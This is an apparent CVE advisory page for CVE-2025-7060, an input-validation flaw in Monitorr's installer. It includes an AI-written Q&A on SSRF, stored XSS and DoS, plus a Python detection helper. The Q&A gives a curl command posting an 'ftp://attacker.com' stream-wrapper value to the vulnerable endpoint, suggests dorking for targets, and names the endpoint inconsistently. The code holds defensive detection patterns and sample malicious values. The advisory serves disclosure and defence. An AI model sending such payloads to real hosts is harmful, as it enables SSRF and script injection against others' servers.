CVE-2025-7060
BaseFortify
Publication date: 2025-07-04
Last updated on: 2026-04-29
Assigner: VulDB
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| monitorr | monitorr | to 1.7.6m (inc) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
| NVD-CWE-noinfo | |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7060 is a vulnerability in Monitorr up to version 1.7.6m, specifically in the Installer component's mkdbajax.php file. It arises from improper input validation of the 'datadir' argument, which can be manipulated remotely. Attackers can supply a 'datadir' value that points to malicious JSON files via PHP stream wrappers (e.g., ftp://), causing the server to fetch and write attacker-controlled data. This leads to multiple issues including stored Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), and partial Denial of Service (DoS). Exploitation is difficult but possible without authentication, and a proof-of-concept exploit is publicly available. [1, 2]
How can this vulnerability impact me?
This vulnerability can impact you by allowing attackers to execute stored XSS attacks, which can compromise user sessions or perform malicious actions in the context of the Monitorr web interface. It also enables SSRF attacks, allowing attackers to make unauthorized requests from the server to internal or external resources, potentially exposing sensitive data or internal services. Additionally, it can cause partial denial of service by destabilizing or crashing the application. Overall, it affects the confidentiality, integrity, and availability of the system. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by searching for the presence of the vulnerable endpoint `/assets/config/_installation/mkdbajax.php` on your Monitorr installation, and by checking if the 'datadir' parameter is improperly handled. One detection method is to use Google hacking techniques such as searching for `inurl:assets/config/_installation/mkdbajax.php` to identify vulnerable targets. Additionally, you can monitor POST requests to `/assets/config/_installation/mkdirajax.php` that set the 'datadir' parameter to suspicious values like PHP stream wrapper URLs (e.g., ftp://, ssh://). Example commands include using curl to test the endpoint: `curl -X POST -d "datadir=ftp://attacker.com/malicious.json" http://your-monitorr-host/assets/config/_installation/mkdbajax.php` and observing the response or behavior. Network monitoring tools can also be configured to alert on such suspicious POST requests. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include validating and sanitizing the 'datadir' input parameter to prevent the use of PHP stream wrappers such as ftp:// or ssh://. Since no official patches or countermeasures have been published, consider restricting access to the vulnerable endpoints, disabling or removing the affected installer component if possible, and monitoring for suspicious POST requests to `/assets/config/_installation/mkdirajax.php` and `/assets/config/_installation/mkdbajax.php`. If feasible, replace the affected Monitorr version with a non-vulnerable version or alternative software. Additionally, avoid exposing the Monitorr installation publicly until a fix is available. [1, 2]
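As an added example (not code from the BaseFortify page or the Monitorr project), the following Python helper applies the allow-list check on `datadir` recommended above and flags installer POSTs whose `datadir` carries a stream-wrapper scheme prefix or path traversal. The request records, the IP addresses and the `classify_datadir`/`flag_requests` names are constructed for this illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request records (not real traffic): (method, path, raw POST body).
SAMPLE_REQUESTS = [
    ("POST", "/assets/config/_installation/mkdbajax.php", "datadir=ftp://198.51.100.7/db.json"),
    ("POST", "/assets/config/_installation/mkdbajax.php", "datadir=data"),
    ("POST", "/assets/config/_installation/mkdbajax.php", "datadir=ssh://203.0.113.9/db.json"),
    ("POST", "/assets/config/_installation/mkdirajax.php", "datadir=../../etc"),
    ("GET",  "/index.php", ""),
]

# Installer endpoints named in the advisory text above.
INSTALLER_PATHS = ("/assets/config/_installation/mkdbajax.php",
                   "/assets/config/_installation/mkdirajax.php")

# Any "scheme:" prefix selects a PHP stream wrapper (ftp://, ssh://, data:, ...).
# A Windows drive letter such as "C:" would also match; on a Linux host that is still worth a look.
WRAPPER_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.IGNORECASE)

def datadir_is_safe(value: str) -> bool:
    """Allow-list a hardened installer would apply: one relative directory name,
    no scheme, no path separators, no traversal."""
    return re.fullmatch(r"[A-Za-z0-9_\-]{1,64}", value) is not None

def classify_datadir(value: str) -> str:
    """Label a datadir value for alerting or rejection."""
    if WRAPPER_RE.match(value):
        return "stream-wrapper"
    if ".." in value or value.startswith("/"):
        return "path-traversal"
    if datadir_is_safe(value):
        return "benign"
    return "unexpected"

def flag_requests(records):
    """Return (path, datadir, label) for installer POSTs whose datadir is not benign."""
    findings = []
    for method, path, body in records:
        if method != "POST" or path not in INSTALLER_PATHS:
            continue
        for value in parse_qs(body).get("datadir", []):
            label = classify_datadir(value)
            if label != "benign":
                findings.append((path, value, label))
    return findings

if __name__ == "__main__":
    for finding in flag_requests(SAMPLE_REQUESTS):
        print(finding)
```

The same `datadir_is_safe` rule can be ported to the PHP handler itself so that a value carrying any scheme prefix is rejected before it reaches a file or stream function.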